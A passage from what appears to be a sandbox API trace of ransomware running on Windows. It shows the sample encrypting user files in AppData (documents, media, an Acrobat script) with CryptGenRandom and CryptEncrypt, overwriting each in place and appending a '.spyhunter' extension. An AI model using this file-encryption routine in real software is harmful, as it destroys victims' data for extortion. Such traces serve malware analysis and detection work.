pbData=0x31f110*, pdwDataLen=0x25cf0b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf0b0*=0x30) returned 1 [0140.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\M3KzCI.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\m3kzci.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0140.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\M3KzCI.csv") returned 60 [0140.859] StrStrW (lpFirst="M3KzCI.csv", lpSrch=".txt") returned 0x0 [0140.860] GetProcessHeap () returned 0x2c0000 [0140.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0140.860] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf074, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf074*=0x2800, lpOverlapped=0x0) returned 1 [0140.860] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.860] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf074, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf074*=0x2800, lpOverlapped=0x0) returned 1 [0140.861] GetProcessHeap () returned 0x2c0000 [0140.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0140.861] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.861] WriteFile (in: hFile=0xf0, lpBuffer=0x25cf0b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf074, lpOverlapped=0x0 | out: lpBuffer=0x25cf0b4*, lpNumberOfBytesWritten=0x25cf074*=0x4, lpOverlapped=0x0) returned 1 [0140.861] WriteFile (in: hFile=0xf0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf074, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf074*=0x30, lpOverlapped=0x0) returned 1 [0140.861] CloseHandle (hObject=0xf0) returned 1 [0140.861] GetProcessHeap () returned 0x2c0000 [0140.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.861] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\M3KzCI.csv.spyhunter") returned 70 [0140.861] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\M3KzCI.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\m3kzci.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\M3KzCI.csv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\m3kzci.csv.spyhunter")) returned 1 [0140.862] GetProcessHeap () returned 0x2c0000 [0140.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.862] GetProcessHeap () returned 0x2c0000 [0140.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.862] GetProcessHeap () returned 0x2c0000 [0140.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85c58 | out: hHeap=0x2c0000) returned 1 [0140.862] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf0b8 | out: pbBuffer=0x25cf0b8) returned 1 [0140.862] GetProcessHeap () returned 0x2c0000 [0140.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.862] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf0b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf0b0*=0x30) returned 1 [0140.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l DcdonPW.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\l dcdonpw.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0140.863] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l DcdonPW.bmp") returned 63 [0140.863] StrStrW (lpFirst="l DcdonPW.bmp", lpSrch=".txt") returned 0x0 [0140.863] GetProcessHeap () returned 0x2c0000 [0140.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0140.863] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf074, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf074*=0x2800, lpOverlapped=0x0) returned 1 [0140.864] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.864] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf074, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf074*=0x2800, lpOverlapped=0x0) returned 1 [0140.864] GetProcessHeap () returned 0x2c0000 [0140.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0140.864] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.864] WriteFile (in: hFile=0xf0, lpBuffer=0x25cf0b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf074, lpOverlapped=0x0 | out: lpBuffer=0x25cf0b4*, lpNumberOfBytesWritten=0x25cf074*=0x4, lpOverlapped=0x0) returned 1 [0140.864] WriteFile (in: hFile=0xf0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf074, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf074*=0x30, lpOverlapped=0x0) returned 1 [0140.864] CloseHandle (hObject=0xf0) returned 1 [0140.864] GetProcessHeap () returned 0x2c0000 [0140.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.864] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l DcdonPW.bmp.spyhunter") returned 73 [0140.864] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l DcdonPW.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\l dcdonpw.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l DcdonPW.bmp.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\l dcdonpw.bmp.spyhunter")) returned 1 [0140.866] GetProcessHeap () returned 0x2c0000 [0140.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.866] GetProcessHeap () returned 0x2c0000 [0140.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.866] GetProcessHeap () returned 0x2c0000 [0140.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85b90 | out: hHeap=0x2c0000) returned 1 [0140.868] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf0a8 | out: pbBuffer=0x25cf0a8) returned 1 [0140.868] GetProcessHeap () returned 0x2c0000 [0140.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.868] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf0a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf0a0*=0x30) returned 1 [0140.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gnZDNdcxwqAJ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gnzdndcxwqaj.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0140.869] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gnZDNdcxwqAJ.mkv") returned 66 [0140.869] StrStrW (lpFirst="gnZDNdcxwqAJ.mkv", lpSrch=".txt") returned 0x0 [0140.869] GetProcessHeap () returned 0x2c0000 [0140.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0140.869] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf064, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf064*=0x2800, lpOverlapped=0x0) returned 1 [0140.870] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.870] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf064, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf064*=0x2800, lpOverlapped=0x0) returned 1 [0140.870] GetProcessHeap () returned 0x2c0000 [0140.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0140.870] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.870] WriteFile (in: hFile=0xf0, lpBuffer=0x25cf0a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf064, lpOverlapped=0x0 | out: lpBuffer=0x25cf0a4*, lpNumberOfBytesWritten=0x25cf064*=0x4, lpOverlapped=0x0) returned 1 [0140.870] WriteFile (in: hFile=0xf0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf064, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf064*=0x30, lpOverlapped=0x0) returned 1 [0140.870] CloseHandle (hObject=0xf0) returned 1 [0140.870] GetProcessHeap () returned 0x2c0000 [0140.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.871] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gnZDNdcxwqAJ.mkv.spyhunter") returned 76 [0140.871] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gnZDNdcxwqAJ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gnzdndcxwqaj.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gnZDNdcxwqAJ.mkv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gnzdndcxwqaj.mkv.spyhunter")) returned 1 [0140.872] GetProcessHeap () returned 0x2c0000 [0140.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.872] GetProcessHeap () returned 0x2c0000 [0140.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.872] GetProcessHeap () returned 0x2c0000 [0140.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08888 | out: hHeap=0x2c0000) returned 1 [0140.872] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf0a8 | out: pbBuffer=0x25cf0a8) returned 1 [0140.872] GetProcessHeap () returned 0x2c0000 [0140.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.872] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf0a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf0a0*=0x30) returned 1 [0140.872] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gfPtZf8yMFe8Bno.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gfptzf8ymfe8bno.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0140.873] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gfPtZf8yMFe8Bno.pdf") returned 69 [0140.873] StrStrW (lpFirst="gfPtZf8yMFe8Bno.pdf", lpSrch=".txt") returned 0x0 [0140.873] GetProcessHeap () returned 0x2c0000 [0140.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0140.873] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf064, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf064*=0x2800, lpOverlapped=0x0) returned 1 [0140.874] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.874] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf064, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf064*=0x2800, lpOverlapped=0x0) returned 1 [0140.874] GetProcessHeap () returned 0x2c0000 [0140.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0140.874] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.874] WriteFile (in: hFile=0xf0, lpBuffer=0x25cf0a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf064, lpOverlapped=0x0 | out: lpBuffer=0x25cf0a4*, lpNumberOfBytesWritten=0x25cf064*=0x4, lpOverlapped=0x0) returned 1 [0140.874] WriteFile (in: hFile=0xf0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf064, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf064*=0x30, lpOverlapped=0x0) returned 1 [0140.874] CloseHandle (hObject=0xf0) returned 1 [0140.874] GetProcessHeap () returned 0x2c0000 [0140.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.875] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gfPtZf8yMFe8Bno.pdf.spyhunter") returned 79 [0140.875] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gfPtZf8yMFe8Bno.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gfptzf8ymfe8bno.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gfPtZf8yMFe8Bno.pdf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gfptzf8ymfe8bno.pdf.spyhunter")) returned 1 [0140.876] GetProcessHeap () returned 0x2c0000 [0140.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.876] GetProcessHeap () returned 0x2c0000 [0140.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.876] GetProcessHeap () returned 0x2c0000 [0140.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81978 | out: hHeap=0x2c0000) returned 1 [0140.876] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf0a0 | out: pbBuffer=0x25cf0a0) returned 1 [0140.876] GetProcessHeap () returned 0x2c0000 [0140.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.876] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf098*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf098*=0x30) returned 1 [0140.876] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\F785hRv.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\f785hrv.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0140.877] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\F785hRv.ods") returned 61 [0140.877] StrStrW (lpFirst="F785hRv.ods", lpSrch=".txt") returned 0x0 [0140.877] GetProcessHeap () returned 0x2c0000 [0140.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0140.877] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf05c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf05c*=0x2800, lpOverlapped=0x0) returned 1 [0140.878] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.878] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf05c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf05c*=0x2800, lpOverlapped=0x0) returned 1 [0140.878] GetProcessHeap () returned 0x2c0000 [0140.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0140.878] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.878] WriteFile (in: hFile=0xf0, lpBuffer=0x25cf09c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf05c, lpOverlapped=0x0 | out: lpBuffer=0x25cf09c*, lpNumberOfBytesWritten=0x25cf05c*=0x4, lpOverlapped=0x0) returned 1 [0140.878] WriteFile (in: hFile=0xf0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf05c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf05c*=0x30, lpOverlapped=0x0) returned 1 [0140.878] CloseHandle (hObject=0xf0) returned 1 [0140.878] GetProcessHeap () returned 0x2c0000 [0140.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.879] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\F785hRv.ods.spyhunter") returned 71 [0140.879] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\F785hRv.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\f785hrv.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\F785hRv.ods.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\f785hrv.ods.spyhunter")) returned 1 [0140.879] GetProcessHeap () returned 0x2c0000 [0140.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.879] GetProcessHeap () returned 0x2c0000 [0140.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.879] GetProcessHeap () returned 0x2c0000 [0140.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x2c0000) returned 1 [0140.880] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf0a0 | out: pbBuffer=0x25cf0a0) returned 1 [0140.880] GetProcessHeap () returned 0x2c0000 [0140.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.880] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf098*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf098*=0x30) returned 1 [0140.880] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CrdIqx.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\crdiqx.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0140.880] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CrdIqx.mp3") returned 60 [0140.880] StrStrW (lpFirst="CrdIqx.mp3", lpSrch=".txt") returned 0x0 [0140.880] GetProcessHeap () returned 0x2c0000 [0140.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0140.880] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf05c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf05c*=0x165c, lpOverlapped=0x0) returned 1 [0140.918] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffe9a4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.918] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x165c, lpNumberOfBytesWritten=0x25cf05c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf05c*=0x165c, lpOverlapped=0x0) returned 1 [0140.918] GetProcessHeap () returned 0x2c0000 [0140.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0140.919] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.919] WriteFile (in: hFile=0xf0, lpBuffer=0x25cf09c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf05c, lpOverlapped=0x0 | out: lpBuffer=0x25cf09c*, lpNumberOfBytesWritten=0x25cf05c*=0x4, lpOverlapped=0x0) returned 1 [0140.919] WriteFile (in: hFile=0xf0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf05c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf05c*=0x30, lpOverlapped=0x0) returned 1 [0140.919] CloseHandle (hObject=0xf0) returned 1 [0140.919] GetProcessHeap () returned 0x2c0000 [0140.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.919] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CrdIqx.mp3.spyhunter") returned 70 [0140.919] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CrdIqx.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\crdiqx.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CrdIqx.mp3.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\crdiqx.mp3.spyhunter")) returned 1 [0140.920] GetProcessHeap () returned 0x2c0000 [0140.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.920] GetProcessHeap () returned 0x2c0000 [0140.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.920] GetProcessHeap () returned 0x2c0000 [0140.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85a00 | out: hHeap=0x2c0000) returned 1 [0141.017] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf090 | out: pbBuffer=0x25cf090) returned 1 [0141.017] GetProcessHeap () returned 0x2c0000 [0141.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0141.017] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf088*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf088*=0x30) returned 1 [0141.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0141.132] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js") returned 88 [0141.132] StrStrW (lpFirst="glob.js", lpSrch=".txt") returned 0x0 [0141.132] GetProcessHeap () returned 0x2c0000 